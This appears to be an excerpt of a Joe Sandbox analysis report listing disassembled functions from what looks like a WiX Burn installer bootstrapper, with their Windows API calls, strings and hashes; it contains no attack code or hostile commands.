Opcode Fuzzy Hash: eb4c1b82c94267e4ef02ebb322377f9d7b1c283dbabf7d98f82ed7c2d95a9156
Instruction Fuzzy Hash: 7421DAB2D01329A7EB209B648C49F9A77ACEF04720F11816DFD14E7241E638DE4487F0

Function 007C3999 Relevance: 4.5, APIs: 3, Instructions: 20memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,007C3B34,00000000,?,007C1472,00000000,80004005,00000000,80004005,00000000,000001C7,?,007C13B7), ref: 007C39A3
RtlFreeHeap.NTDLL(00000000,?,007C3B34,00000000,?,007C1472,00000000,80004005,00000000,80004005,00000000,000001C7,?,007C13B7,000001C7,00000100), ref: 007C39AA
GetLastError.KERNEL32(?,007C3B34,00000000,?,007C1472,00000000,80004005,00000000,80004005,00000000,000001C7,?,007C13B7,000001C7,00000100,?), ref: 007C39B4

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: Heap$ErrorFreeLastProcess
String ID:
API String ID: 406640338-0
Opcode ID: 489856294c1a91392f08022da6d8e90e2bc9c13fd4c1dc07a59cf63f074751ac
Instruction ID: 13d738937461fcfe56b3cb2c1c69ecf1e7055ca03279700db89e0b6c53feae07
Opcode Fuzzy Hash: 489856294c1a91392f08022da6d8e90e2bc9c13fd4c1dc07a59cf63f074751ac
Instruction Fuzzy Hash: 0DD01232600634A7C7502BFA6C0CA97BE9CFF056A17018025FD09D2110D735881086E4

Function 00800E3F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,00000000,?,00805699,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000,00000000), ref: 00800E52

Strings

regutil.cpp, xrefs: 00800E8A

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: Open
String ID: regutil.cpp
API String ID: 71445658-955085611
Opcode ID: 93bb0d60e3df8d14b5775f979ea1c0e74f0f638eeb750d1b2f0d37ffbf78b823
Instruction ID: f28fb58ac58d445e7663f28eb7b7b851550601095e69a4ff0009fbf37b8a4639
Opcode Fuzzy Hash: 93bb0d60e3df8d14b5775f979ea1c0e74f0f638eeb750d1b2f0d37ffbf78b823
Instruction Fuzzy Hash: 34F0A772702135ABDF245A968C04BA77E85FF447B0F118528BD49EA291E335CC1196D0

Function 007C3A72 Relevance: 3.0, APIs: 2, Instructions: 14memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,000001C7,?,?,007C227D,?,000001C7,00000001,80004005,8007139F,?,?,0080015F,8007139F,?,00000000), ref: 007C3A86
RtlReAllocateHeap.NTDLL(00000000,?,007C227D,?,000001C7,00000001,80004005,8007139F,?,?,0080015F,8007139F,?,00000000,00000000,8007139F), ref: 007C3A8D

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: be87e1cb50f89b37192c808a6c646dd9a9541d49ffa0fe7f0cdd19178d3db1f7
Instruction ID: e1a7288f6c06c80154a7f9d5d66d9f82d09775eaab5539294ce507661642ce64
Opcode Fuzzy Hash: be87e1cb50f89b37192c808a6c646dd9a9541d49ffa0fe7f0cdd19178d3db1f7
Instruction Fuzzy Hash: E3D0123315020DEBCF405FE8DC0DDAE3BACFB586127008415F915C2210C73DE4609B60

Function 00803499 Relevance: 1.6, APIs: 1, Instructions: 101COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 008034CE

Part of subcall function 00802F23: GetModuleHandleA.KERNEL32(kernel32.dll,00000000,00000000,008034DF,00000000,?,00000000), ref: 00802F3D
Part of subcall function 00802F23: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,007EBDED,?,007C52FD,?,00000000,?), ref: 00802F49

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: ErrorHandleInitLastModuleVariant
String ID:
API String ID: 52713655-0
Opcode ID: 79e46ebd6c060f9132a38bcbce111fd1f4ef25b71fedd43de5516db903c5e9ee
Instruction ID: a3825297edf443c5c6e079e73a067d6d8c995dda7632f6c3a420359a06e55f24
Opcode Fuzzy Hash: 79e46ebd6c060f9132a38bcbce111fd1f4ef25b71fedd43de5516db903c5e9ee
Instruction Fuzzy Hash: E5311A76E006299BCB11DFA8D884ADEB7F8FF08750F01456AED15EB361D6749E048BA0

Function 00805728 Relevance: 1.6, APIs: 1, Instructions: 60registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32(80070490,00000000,80070490,0082AAA0,00000000,80070490,0107A3C0,?,007D890E,WiX\Burn,PackageCache,00000000,0082AAA0,00000000,00000000,80070490), ref: 00805782

Part of subcall function 00800F6E: RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000001,00000000,00000000,00000000,00000000,00000000), ref: 00800FE4
Part of subcall function 00800F6E: RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,?), ref: 0080101F

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: QueryValue$Close
String ID:
API String ID: 1979452859-0
Opcode ID: 8d1593f26cbfc561e75dab5bc3c7efaf78e9bcaa9709556c3c1fc626bbb7e799
Instruction ID: cb7af08c029c121c0baff83fd5229c08c7b5d0c0c8e45c44a442c6324bc52883
Opcode Fuzzy Hash: 8d1593f26cbfc561e75dab5bc3c7efaf78e9bcaa9709556c3c1fc626bbb7e799
Instruction Fuzzy Hash: B811A07690152EEBDF61AEA89C81AAFB769FB04720B150239ED01A7151C3314D50FEE1

Function 007C34C5 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

SHGetFolderPathW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000000,00000104,00000000,?,007D89CA,0000001C,80070490,00000000,00000000,80070490), ref: 007C34E5

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: FolderPath
String ID:
API String ID: 1514166925-0
Opcode ID: 2adea7225f21e738cc717ab8a4b9c20b03bfead0f85d67703982f40375e999ff
Instruction ID: bf1505f9acc9cd67eb3500727242a3a49d2ed4b36305e405e587884972e21b04
Opcode Fuzzy Hash: 2adea7225f21e738cc717ab8a4b9c20b03bfead0f85d67703982f40375e999ff
Instruction Fuzzy Hash: F3E012722012257BE6026E625C0AEEB7B9CEF09760704805DFE40E6101E669EA1096B0

Function 007FF37A Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 007FF35B

Part of subcall function 00809814: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00809891
Part of subcall function 00809814: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008098A2

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 4ef8d791e375a0f5e34436a2b28fc12851a0bbf3f1ce41bd5782a7c8d754ba9a
Instruction ID: 629b57cb1f6fcfff342128720c669f95c3079ebecdd5288c3eed65175909d0a6
Opcode Fuzzy Hash: 4ef8d791e375a0f5e34436a2b28fc12851a0bbf3f1ce41bd5782a7c8d754ba9a
Instruction Fuzzy Hash: F4B01291279912AD328853593C02C36054CEFC1F20338C13BF250C1381FCA40CC80033

Function 007FF36A Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 007FF35B

Part of subcall function 00809814: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00809891
Part of subcall function 00809814: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008098A2

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: e593cc74461526203ef6415f0979f700e8c9e4dfad2dd5a42db5c30ae1432049
Instruction ID: c5ef073c403ed3d76e4ff8cd67021a19f3c71a820690d8700ce11dc528e90455
Opcode Fuzzy Hash: e593cc74461526203ef6415f0979f700e8c9e4dfad2dd5a42db5c30ae1432049
Instruction Fuzzy Hash: 52B01291279812AE328853593D03C36054CEFC2F20338C03BF250C1381FC980CC90033

Function 007FF349 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 007FF35B

Part of subcall function 00809814: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00809891
Part of subcall function 00809814: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008098A2

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 889d0d9936f140e240c0c46426228bc452b692587d718229176c360db5f099db
Instruction ID: 4520b58f44d959509abfd293daab08152c36ca30681a89fd16f185d05e46cf9a
Opcode Fuzzy Hash: 889d0d9936f140e240c0c46426228bc452b692587d718229176c360db5f099db
Instruction Fuzzy Hash: 79B01292279812BD324813557C02C36060CEFC1F24338C03BF750D0281FC980DC84033

Function 008094D5 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 008094E7

Part of subcall function 00809814: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00809891
Part of subcall function 00809814: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008098A2

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 24fd25826f4c8fd44ae2c853b68cff445d204c41427a5773de72acd9c89461c8
Instruction ID: 7d2b7ca32566fb0cf8514b1e242be1ebfaca280c1427de8be0ed1ba1d17f16a0
Opcode Fuzzy Hash: 24fd25826f4c8fd44ae2c853b68cff445d204c41427a5773de72acd9c89461c8
Instruction Fuzzy Hash: 2EB0128527AD15BD768822593C42C36010CFAC0F10330C17AF651D11C2B8400CCD0033

Function 008094F6 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 008094E7

Part of subcall function 00809814: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00809891
Part of subcall function 00809814: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008098A2

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 375d2cb55244b1e62a69f1e36cdb19004d253329bb67f147e65396a61a603955
Instruction ID: 808677acdb742ceed524e80c82625c618aa729e96446b0c0d281de045040628e
Opcode Fuzzy Hash: 375d2cb55244b1e62a69f1e36cdb19004d253329bb67f147e65396a61a603955
Instruction Fuzzy Hash: AFB0128527AC12AD72C862593C03C36020CF6C0F10330C17AFA51C22C2F8400CCD4033

Function 00809506 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 008094E7

Part of subcall function 00809814: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00809891
Part of subcall function 00809814: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008098A2

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 26dff23749f14186f8d8549b5e2213724f5b336f6842ec69c023567f6ae42798
Instruction ID: ab77512c84a38fe349fc0aeef7d5565713d7383ae5376fc8c8ae40c5b7b55d68
Opcode Fuzzy Hash: 26dff23749f14186f8d8549b5e2213724f5b336f6842ec69c023567f6ae42798
Instruction Fuzzy Hash: D3B0128527AE11AD76C862993E03C36010CFAC1F10330C17AF651C22C2F8440CCE0033

Non-executed Functions

Function 007CA7EF Relevance: 172.2, APIs: 29, Strings: 69, Instructions: 688COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(?), ref: 007CB01A

Part of subcall function 007C38D4: GetProcessHeap.KERNEL32(?,000001C7,?,007C2284,000001C7,00000001,80004005,8007139F,?,?,0080015F,8007139F,?,00000000,00000000,8007139F), ref: 007C38E5
Part of subcall function 007C38D4: RtlAllocateHeap.NTDLL(00000000,?,007C2284,000001C7,00000001,80004005,8007139F,?,?,0080015F,8007139F,?,00000000,00000000,8007139F), ref: 007C38EC

CompareStringW.KERNEL32(0000007F,00000000,0080CA64,000000FF,DirectorySearch,000000FF,0080CA64,Condition,feclient.dll,0080CA64,Variable,?,0080CA64,0080CA64,?,?), ref: 007CA927
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,exists,000000FF,?,Type,?,?,Path,clbcatq.dll), ref: 007CA97C
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,path,000000FF), ref: 007CA998
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,FileSearch,000000FF), ref: 007CA9BC
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,exists,000000FF,?,Type,?,?,Path,clbcatq.dll), ref: 007CAA0F
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,version,000000FF), ref: 007CAA29
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,RegistrySearch,000000FF), ref: 007CAA51
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,HKCR,000000FF,?,Root,?), ref: 007CAA8F
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,HKCU,000000FF), ref: 007CAAAE
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,HKLM,000000FF), ref: 007CAACD
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,exists,000000FF,?,Win64,msi.dll,?,Type,?,?,Value,version.dll,?), ref: 007CAB8B
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,value,000000FF), ref: 007CABA5

Part of subcall function 008031C7: VariantInit.OLEAUT32(?), ref: 008031DD
Part of subcall function 008031C7: SysAllocString.OLEAUT32(?), ref: 008031F9
Part of subcall function 008031C7: VariantClear.OLEAUT32(?), ref: 00803280
Part of subcall function 008031C7: SysFreeString.OLEAUT32(00000000), ref: 0080328B

CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,numeric,000000FF,?,VariableType,?,?,ExpandEnvironment,cabinet.dll), ref: 007CAC04
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,string,000000FF), ref: 007CAC26
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,version,000000FF), ref: 007CAC46
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,directory,000000FF), ref: 007CAD1E
SysFreeString.OLEAUT32(?), ref: 007CAEFC

Strings

comres.dll, xrefs: 007CACA4, 007CAD59, 007CAD89, 007CAE8E
ComponentId, xrefs: 007CACA5
feclient.dll, xrefs: 007CA8F6
=S|, xrefs: 007CA7EF
Invalid value for @Root: %ls, xrefs: 007CAF76
MsiComponentSearch, xrefs: 007CAC5F
UpgradeCode, xrefs: 007CAD8A
Win64, xrefs: 007CAB5B
Failed to get @ProductCode., xrefs: 007CAFBC
Failed to get @ComponentId., xrefs: 007CAF84
Failed to get next node., xrefs: 007CAFE9
HKU, xrefs: 007CAADF
Path, xrefs: 007CA939, 007CA9CC
Root, xrefs: 007CAA67
Failed to get @Root., xrefs: 007CAF7D
value, xrefs: 007CAB98
Failed to get @VariableType., xrefs: 007CAF62
HKCR, xrefs: 007CAA80
state, xrefs: 007CACF5, 007CAE11, 007CAEC3
Failed to get @FeatureId., xrefs: 007CAFB5
Failed to get @Path., xrefs: 007CAF30
ExpandEnvironment, xrefs: 007CABB9
VariableType, xrefs: 007CABDC
numeric, xrefs: 007CABF5
Failed to get @Id., xrefs: 007CAFE2
DirectorySearch|FileSearch|RegistrySearch|MsiComponentSearch|MsiProductSearch|MsiFeatureSearch, xrefs: 007CA80B
Key, xrefs: 007CAB02
Type, xrefs: 007CA954, 007CA9E7, 007CAB40, 007CACC0, 007CADC0, 007CAEAA
Value, xrefs: 007CAB1D
msi.dll, xrefs: 007CAB5A
FeatureId, xrefs: 007CAE8F
Failed to select search nodes., xrefs: 007CA81E
string, xrefs: 007CAC19
Condition, xrefs: 007CA8F7
directory, xrefs: 007CAD11
DirectorySearch, xrefs: 007CA918
Invalid value for @VariableType: %ls, xrefs: 007CAF5B
language, xrefs: 007CADF5
Failed to allocate memory for search structs., xrefs: 007CA87B
Failed to get Value attribute., xrefs: 007CAF3A
HKLM, xrefs: 007CAAC0
path, xrefs: 007CA98B, 007CAA38
Failed to get @UpgradeCode., xrefs: 007CAF8B
MsiProductSearch, xrefs: 007CAD37
clbcatq.dll, xrefs: 007CA938, 007CA9CB, 007CAC81, 007CAE73
cabinet.dll, xrefs: 007CABB8
version.dll, xrefs: 007CAB1C
Variable, xrefs: 007CA8DC
RegistrySearch, xrefs: 007CAA44
exists, xrefs: 007CA96D, 007CAA00, 007CAB7C
Unexpected element name: %ls, xrefs: 007CAFCB
Invalid value for @Type: %ls, xrefs: 007CAF9F
Failed to get @ExpandEnvironment., xrefs: 007CAF4E
Failed to get Key attribute., xrefs: 007CAF6C
Failed to get @Condition., xrefs: 007CAF26
MsiFeatureSearch, xrefs: 007CAE51
Failed to get @Type., xrefs: 007CAFAE
HKCU, xrefs: 007CAAA1
Failed to get @ProductCode or @UpgradeCode., xrefs: 007CAF92
keyPath, xrefs: 007CACD9
Failed to get search node count., xrefs: 007CA843
version, xrefs: 007CAA1C, 007CAC39, 007CADD9
search.cpp, xrefs: 007CA871
assignment, xrefs: 007CAE2B
FileSearch, xrefs: 007CA9AF
Failed to get @Variable., xrefs: 007CAFDB
Failed to get Win64 attribute., xrefs: 007CAF44
ProductCode, xrefs: 007CAC82, 007CAD5A, 007CAE74
wininet.dll, xrefs: 007CAB01

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: String$Compare$Free$HeapVariant$AllocAllocateClearInitProcess
String ID: =S|$ComponentId$Condition$DirectorySearch$DirectorySearch|FileSearch|RegistrySearch|MsiComponentSearch|MsiProductSearch|MsiFeatureSearch$ExpandEnvironment$Failed to allocate memory for search structs.$Failed to get @ComponentId.$Failed to get @Condition.$Failed to get @ExpandEnvironment.$Failed to get @FeatureId.$Failed to get @Id.$Failed to get @Path.$Failed to get @ProductCode or @UpgradeCode.$Failed to get @ProductCode.$Failed to get @Root.$Failed to get @Type.$Failed to get @UpgradeCode.$Failed to get @Variable.$Failed to get @VariableType.$Failed to get Key attribute.$Failed to get Value attribute.$Failed to get Win64 attribute.$Failed to get next node.$Failed to get search node count.$Failed to select search nodes.$FeatureId$FileSearch$HKCR$HKCU$HKLM$HKU$Invalid value for @Root: %ls$Invalid value for @Type: %ls$Invalid value for @VariableType: %ls$Key$MsiComponentSearch$MsiFeatureSearch$MsiProductSearch$Path$ProductCode$RegistrySearch$Root$Type$Unexpected element name: %ls$UpgradeCode$Value$Variable$VariableType$Win64$assignment$cabinet.dll$clbcatq.dll$comres.dll$directory$exists$feclient.dll$keyPath$language$msi.dll$numeric$path$search.cpp$state$string$value$version$version.dll$wininet.dll
API String ID: 2748437055-906430479
Opcode ID: 569ca128c0cca7437f78099b030fdb4cbf4aa87d6d0d57f07a153ef4bed7314b
Instruction ID: 1ac905c33df70da0380044bc7148f42ba2fc689cfe7258e45cc5683860795d9b
Opcode Fuzzy Hash: 569ca128c0cca7437f78099b030fdb4cbf4aa87d6d0d57f07a153ef4bed7314b
Instruction Fuzzy Hash: F522C37194822ABACB619A548C42FAFBB65FB14739F20071CF530F62D1D778DE40D692

Function 007C3BC3 Relevance: 47.6, APIs: 23, Strings: 4, Instructions: 311fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,?,?,?,00000001,00000000,?), ref: 007C3C3F
GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 007C3C52
SetFileAttributesW.KERNEL32(?,00000080,?,?,?,00000001,00000000,?), ref: 007C3C9D
GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 007C3CA7
GetTempPathW.KERNEL32(00000104,?,?,?,?,00000001,00000000,?), ref: 007C3CF5
GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 007C3CFF
FindFirstFileW.KERNEL32(?,?,?,*.*,?,?,?,?,00000001,00000000,?), ref: 007C3D52
GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 007C3D63
SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,00000001,00000000,?), ref: 007C3E3D
DeleteFileW.KERNEL32(?,?,?,?,?,?,?,00000001,00000000,?), ref: 007C3E51
GetTempFileNameW.KERNEL32(?,DEL,00000000,?,?,?,?,00000001,00000000,?), ref: 007C3E78
MoveFileExW.KERNEL32(?,?,00000001,?,?,?,00000001,00000000,?), ref: 007C3E9B
MoveFileExW.KERNEL32(?,00000000,00000004,?,?,?,00000001,00000000,?), ref: 007C3EB4
FindNextFileW.KERNEL32(000000FF,?,?,?,?,?,?,?,00000001,00000000,?), ref: 007C3EC4
GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 007C3ED9
GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 007C3F08
GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 007C3F2A
GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 007C3F4C
RemoveDirectoryW.KERNEL32(?,?,?,?,00000001,00000000,?), ref: 007C3F63
GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 007C3F6D
MoveFileExW.KERNEL32(?,00000000,00000004,?,?,?,00000001,00000000,?), ref: 007C3F93
GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 007C3FAE
FindClose.KERNEL32(000000FF,?,?,?,00000001,00000000,?), ref: 007C3FE4

Strings

*.*, xrefs: 007C3D2B
